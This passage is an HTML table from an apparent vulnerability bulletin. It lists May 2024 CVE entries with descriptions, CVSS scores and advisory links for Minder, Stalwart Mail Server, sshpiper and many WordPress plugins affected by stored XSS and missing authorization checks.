<td>Minder is a software supply chain security platform. Prior to version 0.0.49, the Minder REST ingester is vulnerable to a denial of service attack via an attacker-controlled REST endpoint that can crash the Minder server. The REST ingester allows users to interact with REST endpoints to fetch data for rule evaluation. When fetching data with the REST ingester, Minder sends a request to an endpoint and will use the data from the body of the response as the data to evaluate against a certain rule. If the response is sufficiently large, it can drain memory on the machine and crash the Minder server. The attacker can control the remote REST endpoints that Minder sends requests to, and they can configure the remote REST endpoints to return responses with large bodies. They would then instruct Minder to send a request to their configured endpoint that would return the large response which would crash the Minder server. Version 0.0.49 fixes this issue.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35185&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35185" target="_blank">CVE-2024-35185</a><br><a href="https://github.com/stacklok/minder/commit/065049336aac0621ee00a0bb2211f8051d47c14b" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/stacklok/minder/security/advisories/GHSA-fjw8-3gp8-4cvx" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>stalwartlabs--mail-server<br> </td>
<td>Stalwart Mail Server is an open-source mail server. Prior to version 0.8.0, when using `RUN_AS_USER`, the specified user (and therefore, web interface admins) can read arbitrary files as root. This issue affects admins who have set up to run stalwart with `RUN_AS_USER` who handed out admin credentials to the mail server but expect these to only grant access according to the `RUN_AS_USER` and are attacked where the attackers managed to achieve Arbitrary Code Execution using another vulnerability. Version 0.8.0 contains a patch for the issue.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35179&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35179" target="_blank">CVE-2024-35179</a><br><a href="https://github.com/stalwartlabs/mail-server/security/advisories/GHSA-5pfx-j27j-4c6h" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>stellar--stellar-core<br> </td>
<td>Stellar-core is a reference implementation for the peer-to-peer agent that manages the Stellar network. Prior to 20.4.0, core nodes could be randomly crashed due to a race condition with a 3rd party library. The likelihood of affecting the network is low since crashed nodes come back up online right away. Code fix mitigation is part of Stellar-core v20.4.0 release</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32985&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32985" target="_blank">CVE-2024-32985</a><br><a href="https://github.com/stellar/stellar-core/security/advisories/GHSA-mgx8-frjx-x33m" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>swte--Swift Performance Lite<br> </td>
<td>The Swift Performance Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the ajax_handler() function in all versions up to, and including, 2.3.6.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve and modify settings.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3722&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3722" target="_blank">CVE-2024-3722</a><br><a href="https://plugins.trac.wordpress.org/browser/swift-performance-lite/trunk/includes/setup/setup.php#L97" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58b7736a-e3e0-4ecd-9adf-284568b02ef7?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>talspotim--Comments Evolved for WordPress<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in talspotim Comments Evolved for WordPress allows Stored XSS.This issue affects Comments Evolved for WordPress: from n/a through 1.6.3.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34420&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34420" target="_blank">CVE-2024-34420</a><br><a href="https://patchstack.com/database/vulnerability/gplus-comments/wordpress-comments-evolved-for-wordpress-plugin-1-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>techjewel--Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder<br> </td>
<td>The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in all versions up to, and including, 5.1.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the Fluent Forms settings, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This can be chained with CVE-2024-2771 for a low-privileged user to inject malicious web scripts.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2772&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2772" target="_blank">CVE-2024-2772</a><br><a href="https://plugins.trac.wordpress.org/changeset/3073857" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ccba77c-fb90-4906-b0fe-77607ec5df1f?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>tg123--sshpiper<br> </td>
<td>sshpiper is a reverse proxy for sshd. Starting in version 1.0.50 and prior to version 1.3.0, the way the proxy protocol listener is implemented in sshpiper can allow an attacker to forge their connecting address. Commit 2ddd69876a1e1119059debc59fe869cb4e754430 added the proxy protocol listener as the only listener in sshpiper, with no option to toggle this functionality off. This means that any connection that sshpiper is directly (or in some cases indirectly) exposed to can use proxy protocol to forge its source address. Any users of sshpiper who need logs from it for whitelisting/rate limiting/security investigations could have them become much less useful if an attacker is sending a spoofed source address. Version 1.3.0 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35175&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35175" target="_blank">CVE-2024-35175</a><br><a href="https://github.com/tg123/sshpiper/commit/2ddd69876a1e1119059debc59fe869cb4e754430" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/tg123/sshpiper/commit/70fb830dca26bea7ced772ce5d834a3e88ae7f53" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/tg123/sshpiper/security/advisories/GHSA-4w53-6jvp-gg52" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>thehappymonster--Happy Addons for Elementor<br> </td>
<td>The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Event Calendar widget in all versions up to, and including, 3.10.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4391&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4391" target="_blank">CVE-2024-4391</a><br><a href="https://plugins.trac.wordpress.org/browser/happy-elementor-addons/trunk/widgets/event-calendar/widget.php#L1811" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083138/happy-elementor-addons/trunk/widgets/event-calendar/widget.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e75f7e1a-f3bb-4b24-bf04-b83d0e572551?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thehappymonster--Happy Addons for Elementor<br> </td>
<td>The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Stack Group widget in all versions up to, and including, 3.10.7 due to insufficient input sanitization and output escaping on user supplied 'tooltip_position' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4478&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4478" target="_blank">CVE-2024-4478</a><br><a href="https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.7/widgets/image-stack-group/widget.php#L611" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083138/#file584" target="_blank">security@wordfence.com</a><br><a href="https://wordpress.org/plugins/happy-elementor-addons/#developers" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7243f40-5cca-475a-bb27-44fab965bb0e?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thehappymonster--Happy Addons for Elementor<br> </td>
<td>The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_id' parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4865&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4865" target="_blank">CVE-2024-4865</a><br><a href="https://plugins.trac.wordpress.org/browser/happy-elementor-addons/trunk/widgets/skills/widget.php#L359" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087575/happy-elementor-addons/trunk/widgets/skills/widget.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2fdf2020-ad80-44c3-89b6-fc2ba067cd33?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thehappymonster--Happy Addons for Elementor<br> </td>
<td>The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_id' parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5088&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5088" target="_blank">CVE-2024-5088</a><br><a href="https://plugins.trac.wordpress.org/browser/happy-elementor-addons/trunk/widgets/skills/widget.php#L360" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087575/happy-elementor-addons/trunk/widgets/skills/widget.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/203ab09f-7344-4cab-86bf-0c1ec545d78f?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themeisle--Menu Icons by ThemeIsle<br> </td>
<td>The Menu Icons by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'add_mime_type' function in versions up to, and including, 0.13.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4635&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4635" target="_blank">CVE-2024-4635</a><br><a href="https://plugins.trac.wordpress.org/browser/menu-icons/tags/0.13.13/vendor/codeinwp/icon-picker/includes/types/svg.php#L69" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086753/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90284576-6570-4e4c-8eb3-743bc402ea1b?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themelooks--Enter Addons Ultimate Template Builder for Elementor<br> </td>
<td>The Enter Addons - Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Animation Title widget's img tag in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3680&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3680" target="_blank">CVE-2024-3680</a><br><a href="https://wordpress.org/plugins/enteraddons/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/29cc82cb-f3fd-4de5-9731-7ceb1212b0f9?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themelooks--Enter Addons Ultimate Template Builder for Elementor<br> </td>
<td>The Enter Addons - Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Heading widget in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3831&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3831" target="_blank">CVE-2024-3831</a><br><a href="https://wordpress.org/plugins/enteraddons/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62a4dd6a-f970-483e-b1a8-d57f604b7b66?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themeum--Tutor LMS eLearning and online course solution<br> </td>
<td>The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference to Arbitrary Course Deletion in versions up to, and including, 2.7.0 via the 'tutor_course_delete' function due to missing validation on a user controlled key. This can allow authenticated attackers, with Instructor-level permissions and above, to delete any course.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4279&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4279" target="_blank">CVE-2024-4279</a><br><a href="https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course_List.php#L357" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086489/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45d04643-e43a-4732-91bf-e4af7b622e33?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themifyme--Themify Shortcodes<br> </td>
<td>The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's themify_button shortcode in all versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4567&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4567" target="_blank">CVE-2024-4567</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082885/themify-shortcodes" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c63ff9d7-6a14-4186-8550-4e5c50855e7f?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thimpress--LearnPress WordPress LMS Plugin<br> </td>
<td>The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'layout_html' parameter in all versions up to, and including, 4.2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4277&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4277" target="_blank">CVE-2024-4277</a><br><a href="https://plugins.trac.wordpress.org/browser/learnpress/tags/4.2.6.5/inc/ExternalPlugin/Elementor/Widgets/Instructor/ListInstructorsElementor.php?order=date#L96" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46693edf-bcc6-4af8-9f26-5ede865f4694?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thimpress--LearnPress WordPress LMS Plugin<br> </td>
<td>The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to bypass to user registration in versions up to, and including, 4.2.6.5. This is due to missing checks in the 'create_account' function in the checkout. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4444&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4444" target="_blank">CVE-2024-4444</a><br><a href="https://inky-knuckle-2c2.notion.site/Improper-Authentication-in-checkout-leads-privilege-escalation-of-unauthenticated-to-create-accoun-09da24a043884219a891dd1a0fc01af6" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/learnpress/tags/4.2.6.5/inc/class-lp-checkout.php#L79" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082204/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9e1410f-10c9-4654-8b61-cfcdde696da7?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thimpress--Thim Elementor Kit<br> </td>
<td>The Thim Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4329&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4329" target="_blank">CVE-2024-4329</a><br><a href="https://plugins.trac.wordpress.org/browser/thim-elementor-kit/tags/1.1.9.1/inc/elementor/widgets/global/search-form.php#L819" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3275c47d-caf5-49e6-8aa2-20a6d8106f26?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>tigroumeow--Gallery Block (Meow Gallery)<br> </td>
<td>The Gallery Block (Meow Gallery) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data_atts' parameter in versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4386&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4386" target="_blank">CVE-2024-4386</a><br><a href="https://plugins.trac.wordpress.org/browser/meow-gallery/trunk/classes/core.php#L273" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082976/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/477b41a5-b2ff-4b94-9622-824146a0e2ed?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>timstrifler--Exclusive Addons for Elementor<br> </td>
<td>The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Team Member widget in all versions up to, and including, 2.6.9.6 due to insufficient input sanitization and output escaping on user supplied 'url' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4618&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4618" target="_blank">CVE-2024-4618</a><br><a href="https://plugins.trac.wordpress.org/browser/exclusive-addons-for-elementor/tags/2.6.9.6/elements/team-member/team-member.php#L1696" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083582/#file4" target="_blank">security@wordfence.com</a><br><a href="https://wordpress.org/plugins/exclusive-addons-for-elementor/#developers" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e82478c-e476-4cdf-ab72-f578331058e2?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>trinhtuantai--Viet Affiliate Link<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in trinhtuantai Viet Affiliate Link allows Stored XSS.This issue affects Viet Affiliate Link: from n/a through 1.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34422&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34422" target="_blank">CVE-2024-34422</a><br><a href="https://patchstack.com/database/vulnerability/viet-affiliate-link/wordpress-viet-affiliate-link-plugin-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>uapp--Testimonial Carousel For Elementor<br> </td>
<td>The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'show_line_text ' and 'slide_button_hover_animation' parameters in versions up to, and including, 10.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4698&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4698" target="_blank">CVE-2024-4698</a><br><a href="https://plugins.trac.wordpress.org/browser/testimonials-carousel-elementor/trunk/widgets/testimonials-carousel/class-testimonialscarousel-blog.php#L1076" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/testimonials-carousel-elementor/trunk/widgets/testimonials-carousel/class-testimonialscarousel-bottom.php#L1478" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/testimonials-carousel-elementor/trunk/widgets/testimonials-carousel/class-testimonialscarousel-centered.php#L1619" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/testimonials-carousel-elementor/trunk/widgets/testimonials-carousel/class-testimonialscarousel-gallery-coverflow.php#L1876" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/testimonials-carousel-elementor/trunk/widgets/testimonials-carousel/class-testimonialscarousel-logo.php#L1715" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/testimonials-carousel-elementor/trunk/widgets/testimonials-carousel/class-testimonialscarousel.php#L1847" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087862/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4542b0f8-c9ee-4992-b737-e5f727c7b5b0?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>unitecms--Unlimited Elements For Elementor (Free Widgets, Addons, Templates)<br> </td>
<td>The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'google_connect_error' parameter in all versions up to, and including, 1.5.102 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3547&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3547" target="_blank">CVE-2024-3547</a><br><a href="https://plugins.trac.wordpress.org/changeset/3071404/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_settings_output.class.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f629fc93-84ce-4c33-b1c0-3a3194aac477?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>upwerd--Visual Footer Credit Remover<br> </td>
<td>The Visual Footer Credit Remover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'selector' parameter in all versions up to, and including, 2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2846&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2846" target="_blank">CVE-2024-2846</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3081401%40visual-footer-credit-remover&amp;new=3081401%40visual-footer-credit-remover&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9fcb65a0-4218-4728-9c29-0d1a03f438a6?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>videousermanuals--White Label CMS<br> </td>
<td>The White Label CMS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_plugin function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to reset plugin settings.</td>
<td>2024-05-14</td>
